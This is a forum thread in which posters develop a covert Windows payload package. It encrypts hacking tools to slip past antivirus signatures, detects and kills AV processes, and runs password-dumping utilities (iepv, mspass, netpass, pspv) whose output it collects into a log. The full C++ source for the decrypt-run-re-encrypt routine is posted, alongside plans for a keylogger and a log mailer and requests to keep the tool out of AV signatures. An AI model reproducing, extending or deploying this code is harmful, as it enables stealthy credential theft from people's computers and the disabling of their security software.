hexlax

The current snapshot does the following: -Encrypted Package to thwart AV signatures -Determines if AV is running, if it is, executes a clean scanning package. *AV killing is no longer supported, don't ask why, drink bud dry. Current package includes: ipconfig /all* produkey* net user* psloggedon* tracert -h 2* net view* cports* iehv* iepv mspass netcat winvnc netpass pspv *denotes programs that will run if AV is found; ofcourse this can be all controlled from the config file. ToDo: -create U3 image -implement keylogger service and log mailer Please give me feedback!

Just an update: I implemented the AVkill side of the house. I just need to implement the user interface with all the different command line options. Should be completed shortly. From here, we need to test this beast out. So, feel free to hack the source and distribute the executable, but just give me some feedback on what AV's you've tested them on. I know discretion is too much to ask for regarding this program; however, let's try to keep it out of the AV signatures at least for a little while. The next step is to port for Vista and XP 64. Does anyone have experience with porting code from 32bit to 64?

You may also want to check out PsExec from sysinternals. There are many obstacles that one has to overcome when dealing with IP reachback: -the node has a publicly routable IP address -Client Software Firewalls (whether Windows embedded or 3rd party such as Zone Alarm) -NAT, DMZ, port forwarding, etc. Just some ideas. Interesting post though on the key logger. :)

Great! I'll code this up. I'm going to be using this paradigm: -ensure admin privs http://support.microsoft.com/kb/q118626/ -load all processes into an array with pslist -check our known AV processes against the array -kill the process

Hey, I started a new thread for my package implementing the encryption. Right now I'm working on the AVkill side of the program. Please help me out their Scorpio with that AV list you're compiling... http://forums.hak5.org/index.php/topic,8169.0.html

This package has been updated, please scroll down to view the latest development notes... Currently, you can take a look at a snapshot: http://rapidshare.com/files/92198408/scancomp.7z.html or the source: http://rapidshare.com/files/92198966/scanComp-src.7z.html Both of these files require 7zip for extracting.

Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own. This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature based AVs(please provide feedback), once they are ran, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code. /* * AUTHOR: hexlax * * The encryption handling of this program is done. Please * give me feedback if any AVs catch it. * * Command line options for final product(not implemented now): * a) -q quiet mode, nothing displays to screen * b) -f force run anyways * i) if local admin privs not present * ii) if AV is detected and forced stop failed * iii) Places payload in danger of AV removal * c) -c config file path [optional - default presumed] * i) payload list * ii) utilities list (ccrypt, pskill, etc.) * d) -k only attempt to kill AV, no payload run * * The final product should be scalable enough for a user * to add/delete/modify the payload by editing the config file. * */ #include "stdafx.h" #include <iostream> #include <string> #include <stdlib.h> using namespace std; //global constants const string PAYLOAD_FILEPATH = "tools"; //TODO: insert user pref from config file. const string ENC_KEY = "hexlax@hak5"; //TODO: insert user pref from config file. void decrypt() { cout << "Decrypting payload...n"; string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH; system(syscall.c_str()); return; } void encrypt(){ cout << "Encrypting payload back...n"; string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH; system(syscall.c_str()); return; } void run_payload(){ string syscall; cout << "Running Payload:"; //IEPV.EXE cout << ".PSPV.."; syscall = PAYLOAD_FILEPATH + "iepv /stext iepv.tmp"; system(syscall.c_str()); //MSPASS.EXE cout << ".MSPASS..."; syscall = PAYLOAD_FILEPATH + "mspass /stext mspass.tmp"; system(syscall.c_str()); //NETPASS.EXE cout << ".NETPASS.."; syscall = PAYLOAD_FILEPATH + "netpass /stext netpass.tmp"; system(syscall.c_str()); //PSPV.EXE cout << ".PSPV.."; syscall = PAYLOAD_FILEPATH + "pspv /stext pspv.tmp"; system(syscall.c_str()); //END PAYLOAD cout << "n"; return; } void cleanup_temps(){ string syscall = ""; cout << "Cleaning up...n"; //consolidate our tmp files in to one //TODO: implement the user's preference here for a //file name & program list from config file //TODO: after list file is done, use a for statement for cleaner code cout << "Saving output to log.txt...n"; syscall = "type iepv.tmp >> log.txt"; system(syscall.c_str()); syscall = "type mspass.tmp >> log.txt"; system(syscall.c_str()); syscall = "type netpass.tmp >> log.txt"; system(syscall.c_str()); syscall = "type pspv.tmp >> log.txt"; system(syscall.c_str()); //get rid of *.tmp files cout << "Removing temp files...n"; syscall = "del *.tmp"; system(syscall.c_str()); } int main(){ decrypt(); run_payload(); encrypt(); cleanup_temps(); cout << "Scan Complete!n"; return 0; }

True; however, it may be as simple as searching for default installation directories such as "C:Program Files" or even the registry. Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...

Yeah man, as soon as my code is complete and cleaned I'll post it up. Probably not till the weekend though... I'm really interested in that AV list you're compiling. That would help me out greatly!

I've been reading this thread continuously hoping for a solution. It wasn't until I finally took some initiative that I may have figured out a solution. I tested this on XP SP2 running Symantic AV with definition files current as of 12/14/2007. On a different box, I used ccrypt to encrypt the files. This renames the files to <program>. exe. cpt. This successfully passed Symantec scan's. I'm hacking some c++ now which will follow this paradigm: -Scan computer for known AV -If AV present, try to kill the process -If kill successful, decrypt payload -Run payload & encrypt files back Let me know what you think. Once I have some time to get a VM up and running, I'll test ccrypt with other AV's. As far as I know though, this should work against all signature based ones. . .